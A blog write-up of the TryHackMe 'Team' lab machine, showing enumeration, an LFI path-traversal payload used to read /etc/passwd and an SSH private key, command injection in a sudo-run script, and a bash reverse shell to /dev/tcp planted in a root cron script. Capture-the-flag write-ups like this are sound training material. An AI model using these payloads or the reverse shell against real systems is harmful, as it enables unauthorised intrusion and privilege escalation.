Team — TryHackMe

Team THM

This is the write-up for beginner friendly boot2root machine from TryHackMe named Team.This room is available here: https://tryhackme.com/room/teamcw

The task is simple and that is to get both user and root flag.So as always let’s begun the Enumeration of the box with NMAP.

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.167.14

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -sS -Pn -T4 -p- 10.10.167.14
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:14 EST
Nmap scan report for 10.10.167.14
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 108.33 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14

┌──(kali㉿kali)-[/tmp]
└─$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.167.14 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-05 15:26 EST
Nmap scan report for 10.10.167.14
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
| 256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_ 256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (91%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 5.4 (85%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 62.32 ms 10.8.0.1
2 61.12 ms 10.10.167.14
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds

So we have 3 ports open. Port 21 is running FTP and uses vsftpd 3.0.3. A quick searchsploit on this version does not show any know vulnerabilities and also there is no anonymous login available.

Port 22 has OpenSSH 7.6p1 running. This is also relatively new version but might have user enumeration possible. We will keep that in mind and will carry on.

Lets explore Port 80.Putting in the IP Address on to the Browser gives us Default Apache2 It works page. Did some enumeration here but did not find anything.

Entry in /etc/hosts

After making in the entry in to the /etc/hosts for the IP Address of the target along with a name, gives us a new web-page with http://team.thm:

10.10.96.20 team.thm

team.thm

Let’s check if we can brute force directories on this webpage using ffuf

FFUF Scan

┌──(kali㉿kali)-[/tmp]
└─$ ffuf -u http://team.thm/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.2.1
________________________________________________
:: Method : GET
:: URL : http://team.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
scripts [Status: 301, Size: 306, Words: 20, Lines: 10]
index.html [Status: 200, Size: 2966, Words: 140, Lines: 90]
images [Status: 301, Size: 305, Words: 20, Lines: 10]
assets [Status: 301, Size: 305, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 5, Words: 1, Lines: 2]
[Status: 200, Size: 2966, Words: 140, Lines: 90]
.html [Status: 403, Size: 273, Words: 20, Lines: 10]
.php [Status: 403, Size: 273, Words: 20, Lines: 10]
server-status [Status: 403, Size: 273, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 2181 req/sec :: Duration: [0:14:39] :: Errors: 0 ::

Nothing much here apart from robots.txt. Let’s check it out:

robots.txt

There was no directory name “dale”, may be it is a username.Let’s keep it mind and keep enumerating. The Hint says a “dev” site and talks about LFI. Update /etc/hosts file with the following:

10.10.96.20 dev.team.thm team.thm

Replace the IP Address with the one which you got and browse to http://dev.team.thm

Click the Place holder link:

Tried some LFI payloads here and this gave a positive result:

http://dev.team.thm/script.php?page=./../../../etc/passwd

LFI

Ah, we see the user dale,may be we can access his home directory:

user.txt

Yes we can and this gives is our user flag.

LFI to RCE

Now we know that we have a LFI vulnerability, tried to do check for Apache Log Poisoning, SSH Log Poisoning but we did not have access to those logs.So enumerated the files which we can access using few word list:

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI

LFI-gracefulsecurity-linux.txt from SecLists proved to be fruitful.Captured one request in BurpSuite and send it to Intruder:

Burp Set Position

And used the same file as payload and got an interesting result:

Burp Intruder Attack

We can read the Private Key for use “dale”. Let’s use this and login to the target after removing all ‘#’ from the key:

chmod 600 id_rsa 130 ⨯
ssh -i id_rsa dale@10.10.210.177

ssh login as dale

Privilege Escalation

Transfer Linux Smart Enumeration Script on to the target and run it:

LSE

So user “dale” can run /home/gyles/admin_checks as user “gyles”. Checkout what is on this file:

dale@TEAM:~$ cat /home/gyles/admin_checks
#!/bin/bash
printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is "
$error 2>/dev/null
date_save=$(date "+%F-%H-%M")
cp /var/stats/stats.txt /var/stats/stats-$date_save.bak
printf "Stats have been backed up\n"

From this script we can see that we can inject commands while running the above script as user “gyles” because user’s input is not sanitized and used inside the script:

Command Injection

Upgrade shell by running:

/usr/bin/script -qc /bin/bash /dev/null

Ran LSE again, but didn’t got anything interesting.Ran pspy to check if any thing interesting is running:

pspy

From the above output /usr/local/bin/main_backup.sh is running as root (UID=0) and user “gyles” can edit script as he belongs to “admin” group:

User Group

Let’s put in a reverse shell code in to this script and also start a netcat listener:

bash -i >& /dev/tcp/10.8.98.192/9999 0>&1

Reverse Shell

And after a minute or so:

root.txt

That it. We are root. Thanks for reading.

P.S. User dale is a member of “lxd” group. Their is a possible way to get root if user is a member of “lxd” group. I haven’t tried that yet, but will look at that later.

--

--

--

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

iPhone iLoci Memory Palace App, by Don Hopkins @ Mobile Dev Camp

Identifying Code Churn With AskGit SQL

Talk About The Brand-New Microsoft Mesh Platform From A Developer’s Perspective

Ways of Knowledge Sharing In Agile Software Development Organizations

Pinknode Utilizes StackOS’s Decentralized Cloud to Strive Decentralization and Optimized UX

Chapter 2 —Data Models and Query Languages

Hey Baby, What’s Your Sign?

Best Practices for Reducing Down-Time on the Way to Production

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xsanz

0xsanz

Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Prometheus: Installation

PicoCTF \\ Magikarp Ground Mission \\ General Skills

[CVE-2021-44228] Apache Log4j Remote Code Execution (RCE) POC

Filezilla Memory forensic — credentials and files